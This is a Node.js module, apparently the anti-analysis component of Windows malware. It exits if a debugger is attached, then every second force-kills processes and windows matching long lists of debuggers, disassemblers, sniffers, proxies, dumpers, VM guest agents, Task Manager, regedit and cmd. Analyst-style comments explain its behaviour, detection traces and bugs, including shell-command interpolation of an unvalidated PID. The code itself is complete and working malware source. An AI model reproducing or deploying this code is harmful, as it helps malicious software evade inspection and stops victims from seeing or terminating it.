const child_process = require('child_process');
/**
 * Forcibly terminates a single process by PID.
 *
 * Spawns a new `powershell` child via `child_process.exec` running
 * `Stop-Process -Id <pid> -Force`; every call therefore produces a
 * shell + PowerShell process-creation event whose command line contains
 * the target PID (an observable artefact for process-creation telemetry).
 *
 * @param {number|string} pid - interpolated verbatim into the shell command
 *   line; nothing validates it is numeric, so a non-numeric value becomes
 *   part of the executed command text.
 * @returns {Promise<number|string>} resolves with the same `pid` when exec
 *   reports no error; rejects with the exec error (e.g. non-zero exit,
 *   which PowerShell produces when the PID does not exist or access is
 *   denied) or with any synchronous error thrown while starting exec.
 */
const TerminateProcess = (pid) => {
return new Promise((resolve, reject) => {
try {
// `-Force` skips the confirmation prompt; stdout/stderr are ignored,
// only the exec error decides success.
child_process.exec(`powershell Stop-Process -Id ${pid} -Force`, (error, stdout, stderr) => {
if (!error) {
resolve(pid);
} else {
reject(error);
}
});
} catch (error) {
// exec itself threw synchronously (e.g. argument problems) — surface it
// through the same rejection path.
reject(error);
}
});
};
/**
 * Kills every running process whose name matches one of `blacklist`.
 *
 * Builds one PowerShell pipeline:
 * `Get-Process | Where-Object { $_.Name -match '<a|b|c>' } | ForEach-Object { Stop-Process -Id $_.Id -Force }`
 * and runs it in a fresh `powershell` child. The alternation is passed to
 * `-match` as a regular expression and is NOT anchored, so each entry is a
 * substring pattern: a short entry such as "cmd" matches any process whose
 * name contains it. Entries are lower-cased but not regex-escaped, so any
 * regex metacharacter in a name is interpreted as regex syntax, and the
 * resulting text is interpolated straight into the command line.
 *
 * @param {string[]} blacklist - process names (without extension, as
 *   `Get-Process` reports `Name`); joined with `|` after `toLowerCase()`.
 * @returns {Promise<string>} resolves with the literal string
 *   'Finish Process' when exec reports no error (this does not mean any
 *   process was actually stopped — a pipeline that matched nothing also
 *   exits cleanly); rejects with the exec error otherwise.
 */
const KillProcessesByNames = (blacklist) => {
return new Promise((resolve, reject) => {
try {
// e.g. ["Foo", "bar"] -> "foo|bar"; no escaping of regex metacharacters.
const blacklistRegex = blacklist.map(name => name.toLowerCase()).join('|');
child_process.exec(`powershell "Get-Process | Where-Object { $_.Name -match '${blacklistRegex}' } | ForEach-Object { Stop-Process -Id $_.Id -Force }"`, (error, stdout, stderr) => {
if (!error) {
resolve('Finish Process');
} else {
reject(error);
}
});
} catch (error) {
// Synchronous failure while starting exec (e.g. the blacklist is not an
// array) is reported through the same rejection.
reject(error);
}
});
};
/**
 * Lists processes that own a visible top-level window.
 *
 * Runs, in a new `powershell` child, a pipeline that selects processes with a
 * non-empty `MainWindowTitle` and emits `$_.Id` followed by
 * `$_.MainWindowTitle` for each. Because `ForEach-Object { $_.Id, $_.MainWindowTitle }`
 * writes the two values as separate pipeline objects, stdout carries them on
 * separate lines; the result is therefore a FLAT array of alternating
 * `[id, title, id, title, ...]` strings (the consumer must pair index `i-1`
 * with odd index `i`).
 *
 * NOTE(review): the pairing is positional only. A title that is whitespace-only
 * is removed by `filter(Boolean)` after `trim()`, and a title containing a
 * newline is split into several entries; either shifts the id/title pairing
 * for every later element — assumption to confirm against real output.
 *
 * @returns {Promise<string[]>} resolves with the trimmed, non-empty stdout
 *   lines (all strings, PIDs included); rejects with the exec error.
 */
const GetWindowProcesses = () => {
return new Promise((resolve, reject) => {
try {
child_process.exec(`powershell "(Get-Process | Where-Object { $_.MainWindowTitle -ne '' }) | ForEach-Object { $_.Id, $_.MainWindowTitle }"`, (error, stdout, stderr) => {
if (!error) {
// One value per line: trim CR/whitespace, drop blank lines.
const processInfo = stdout.split('\n').map(line => line.trim()).filter(Boolean);
resolve(processInfo);
} else {
reject(error);
}
});
} catch (error) {
reject(error);
}
});
};
/**
 * Kills every windowed process whose window title contains any entry of
 * `blacklist` (case-insensitive substring test on the lower-cased title).
 *
 * Consumes the flat `[id, title, id, title, ...]` array produced by
 * `GetWindowProcesses`: odd indexes are treated as titles and the preceding
 * element as the PID to terminate.
 *
 * Execution notes, visible from the code:
 * - The inner `blacklist.forEach(async ...)` callbacks are not awaited, so the
 *   function resolves as soon as iteration finishes, while the individual
 *   `TerminateProcess` calls are still in flight.
 * - A title matching several entries triggers `TerminateProcess` once per
 *   matching entry (several `Stop-Process` commands for the same PID).
 * - Failures of `TerminateProcess` are caught and discarded (empty catch);
 *   only a failure of `GetWindowProcesses` reaches `console.error`.
 *
 * @param {string[]} blacklist - substrings to look for in window titles;
 *   compared against the lower-cased title, so entries are expected to be
 *   lower-case already (no lower-casing is applied to them here).
 * @returns {Promise<void>} always resolves; never rejects.
 */
const KillProcessesByWindowNames = async (blacklist) => {
try {
const processes = await GetWindowProcesses();
processes.forEach((processInfo, index) => {
// Odd index = window title; the element before it is the PID.
if (index % 2 !== 0) {
const title = processInfo.toLowerCase();
const pid = processes[index - 1];
blacklist.forEach(async (name) => {
if (title.includes(name)) {
try {
await TerminateProcess(pid);
} catch (error) {
// Termination errors are intentionally ignored (best-effort).
}
}
});
}
});
} catch (error) {
console.error(error);
}
};
/**
 * Reports whether a managed debugger is attached — as seen by a NEW
 * PowerShell child process.
 *
 * Executes `[System.Diagnostics.Debugger]::IsAttached` inside a freshly
 * spawned `powershell` and compares its trimmed stdout with the string
 * 'True'. Because the expression is evaluated in that child process, the
 * result describes the PowerShell child, not this Node host process —
 * NOTE(review): confirm, but a debugger attached to the Node process is not
 * what this expression inspects.
 *
 * @returns {Promise<boolean>} `true` only if stdout trims to exactly 'True';
 *   any other output (including errors printed to stdout) yields `false`.
 *   Rejects with the exec error when `powershell` fails to run.
 */
const IsDebuggerPresent = () => {
return new Promise((resolve, reject) => {
try {
child_process.exec('powershell "[System.Diagnostics.Debugger]::IsAttached"', (error, stdout, stderr) => {
if (!error) {
// PowerShell prints the boolean as "True"/"False".
resolve(stdout.trim() === 'True');
} else {
reject(error);
}
});
} catch (error) {
reject(error);
}
});
};
/**
 * Entry point: anti-analysis loop.
 *
 * Behaviour, in order:
 * 1. Calls `IsDebuggerPresent()`; if it resolves `true`, `process.abort()`
 *    ends the Node process immediately.
 * 2. Otherwise registers a `setInterval` that, every 1000 ms, first kills
 *    windowed processes whose title contains a `windowBlacklist` entry, then
 *    kills processes whose name matches a `blacklist` entry. Each tick spawns
 *    at least two `powershell` children (more for every matching window), so
 *    the running module shows up as a steady stream of
 *    `node -> cmd -> powershell` process creations with `Get-Process` /
 *    `Stop-Process` command lines — a high-signal detection pattern.
 *
 * The lists name reverse-engineering and traffic-analysis tools (debuggers,
 * disassemblers, dumpers, proxies, sniffers) and virtualization guest agents
 * (`vmtoolsd`, `vboxservice`, `vboxtray`, `vmwaretray`, `qemu-ga`, `prl_*`,
 * `xenservice`), but also general user tools such as `taskmgr`, `regedit` and
 * `cmd`, which are terminated on every tick as well. Several window-title
 * entries are broad substrings ("debug", "james", "pizza", "phantom", "mdb",
 * "dbx"), so unrelated windows whose titles contain them are killed too.
 *
 * Notes visible from the code:
 * - The interval handle is not stored or returned, so a caller cannot stop
 *   the loop; it runs for the lifetime of the process.
 * - The `try/catch` only wraps the debugger check and the `setInterval`
 *   registration. The interval callback has no handler of its own, so a
 *   rejection from `KillProcessesByNames` (exec error) becomes an unhandled
 *   promise rejection rather than reaching `console.error`.
 *
 * @returns {Promise<void>} resolves once the interval has been registered
 *   (or after logging the error); never rejects.
 */
module.exports = async () => {
// Substrings matched against lower-cased window titles.
const windowBlacklist = [
"process monitor", "protection_id", "de4dotmodded", "x32_dbg", "pizza", "fiddler",
"x64_dbg", "httpanalyzer", "strongod", "wireshark", "gdb", "graywolf", "x64dbg",
"ksdumper v1.1 - by equifox", "wpe pro", "ilspy", "dbx", "ollydbg", "x64netdumper",
"system explorer", "mdbg", "kdb", "charles", "stringdecryptor", "phantom",
"debugger", "extremedumper", "pc-ret", "folderchangesview", "james",
"simpleassemblyexplorer", "dojandqwklndoqwd", "procmon64", "process hacker",
"scyllahide", "kgdb", "systemexplorer", "proxifier", "debug", "httpdebug",
"httpdebugger", "0harmony", "mitmproxy", "ida -", "codecracker", "ghidra", "titanhide",
"hxd", "reversal", "sharpod", "http debugger", "dbgclr", "x32dbg", "sniffer", "petools",
"simpleassembly", "ksdumper", "dnspy", "x96dbg", "de4dot", "exeinfope",
"windbg", "mdb", "harmony", "systemexplorerservice", "megadumper",
];
// Process names (unanchored regex alternation against Get-Process `Name`).
const blacklist = [
"ksdumperclient", "regedit", "ida64", "vmtoolsd", "vgauthservice",
"wireshark", "x32dbg", "ollydbg", "vboxtray", "df5serv", "vmsrvc",
"vmusrvc", "taskmgr", "vmwaretray", "xenservice", "pestudio", "vmwareservice",
"qemu-ga", "prl_cc", "prl_tools", "cmd", "joeboxcontrol", "vmacthlp", "httpdebuggerui",
"processhacker", "joeboxserver", "fakenet", "ksdumper", "vmwareuser", "fiddler",
"x96dbg", "dumpcap", "vboxservice",
];
try {
if (await IsDebuggerPresent()) {
// Immediate, unconditional exit of the Node process.
process.abort();
}
// Handle is discarded: the loop cannot be cleared by the caller.
setInterval(async () => {
await KillProcessesByWindowNames(windowBlacklist);
await KillProcessesByNames(blacklist);
}, 1000);
} catch (error) {
console.error(error);
}
};